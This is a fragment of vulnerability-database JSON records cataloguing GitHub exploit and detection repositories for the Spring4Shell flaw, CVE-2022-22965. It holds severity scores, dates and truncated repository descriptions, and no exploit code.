"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:31", "id": "915DAB75-3A6F-57CC-824E-106D6ACD652D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T20:25:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:14:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-24T08:10:05", "id": "75235F83-D7F4-570F-B966-72159CCBA5CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:36", "description": "# SpringFramework_CVE-2022-22965_RCE\nSpringFramework \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1eCVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T04:51:44", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:32", "id": "52AD8D8E-65ED-5B49-A85D-202C43107E6B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:37", "description": "# Invoke-CVE-2022-22965-SafeCheck\nPowerShell port of [CVE-2022-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:37:27", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T01:28:01", "id": "0126EBDA-4ED9-50FA-BDE5-873011FCD9B6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-07T02:01:54", "description": "# Spring4shell_behinder\n\n## \u8fd9\u662f\u4ec0\u4e48?\n\n\u4e00\u4e2a\u9488\u5bf9spring4shell\u6f0f\u6d1e(CVE-2022-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T03:50:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-06T15:07:47", "id": "7883CC8E-9B35-5C0F-AE2E-271FAC17648B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:30", "description": "# irule-cve-2022-22965\n\nThis is a basic iRule to provide some mi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T02:17:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-11T20:16:21", "id": "A8866ED4-A944-571F-8135-6138A2E9B568", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:12:13", "description": "# Spring4Shell-CVE-2022-22965-POC\n\n```bash\nghost\u327fuchiha:~$ ./exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-03T18:15:07", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-03T18:15:14", "id": "CAD3F237-9F09-5818-ADE3-DF36E8350D41", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T14:24:03", "description": "# Spring4Shell-POC (CVE-2022-22965)\n\n![Spring4Shell](spring4shel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T07:54:45", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-17T09:54:00", "id": "CB56CEFA-343E-5B20-9D5B-C076205FBF6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-20T05:33:39", "description": "# CVE-2022-22965\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-31T08:21:59", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-20T05:27:11", "id": "C4EB8052-6E91-5327-87BE-51E8490B0A4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:55:33", "description": "# Spring Core RCE - CVE-2022-22965\n\n> After Spring Cloud, on Mar...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T17:05:46", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:30", "id": "3B4FEC21-04C2-5299-BFD8-3F9AA518E694", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-20T21:52:01", "description": "# Telstra-Cybersecurity-Virtual-Experience-Program\n\nI participat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-31T12:04:25", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-20T13:39:58", "id": "FACAC290-D83E-5B87-B534-640F9C566696", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-01T17:24:00", "description": "# Spring4Shell\nSpring4Shell (CVE-2022-22965) Proof Of Concept wi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-20T11:45:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-01T12:50:05", "id": "00F5B330-30A9-5854-B811-41A3DCE5A4F8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-01T17:18:29", "description": "# Spring4Shell\nSpring4Shell (CVE-2022-22965) Proof Of Concept wi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-20T11:45:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-01T12:50:05", "id": "F95C4865-A269-5A59-9AD3-3D000443E6FF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:17:57", "description": "\u9776\u673a\n```bash\ndocker run -itd -p 80:8080 vulfocus/spring-core-rce-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-08T13:45:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-07T02:30:57", "id": "6A9484BA-BE10-5232-91F4-678892E7E6DD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-12T04:00:36", "description": "# Spring4Shell-CVE-2022-22965.py\nScript to check for Spring4Shel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-09T08:40:49", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-07-12T02:19:13", "id": "F09161EA-B10D-5DBF-B548-6F9BE7EE20B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:35", "description": "## Spring-Core JDK9+ RCE\n\n### \u4f7f\u7528\u8bf4\u660e\n```\n\u2570\u2500 ./CVE-2022-22965 -h ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T07:55:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:33", "id": "B0EA173F-FDE3-5401-BE03-BEF429622CF2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:00", "description": "# Spring4Shell(CVE-2022-22965)\n\nSpring Framework RCE via Data Bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T13:35:01", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:33", "id": "3DB87825-2C58-5ABC-8BA3-E1CB80AFB11E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:15:16", "description": "# Spring Framework RCE exploitation (Quick pentest notes)\n\n<p al...", "cvss3": {}, "published": "2022-03-31T15:43:06", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T13:15:56", "id": "EF55EC2D-994E-5971-8941-B595536F5992", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:53", "description": "# CVE-2022-22965 poc\nCVE-2022-22965 poc including reverse-shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T19:19:52", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:32", "id": "0018F9FA-176E-52D1-B790-5C67C302BC74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:12", "description": "# Spring Boot CVE-2022-22965\nDocker PoC for CVE-2022-22965 with ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T06:43:07", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-05-24T07:03:48", "id": "85BCA050-E6D6-55FF-A843-F49E52F30346", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:55", "description": "# Safer_PoC_CVE-2022-22965\nA Safer PoC for CVE-2022-22965 (Sprin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T16:58:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 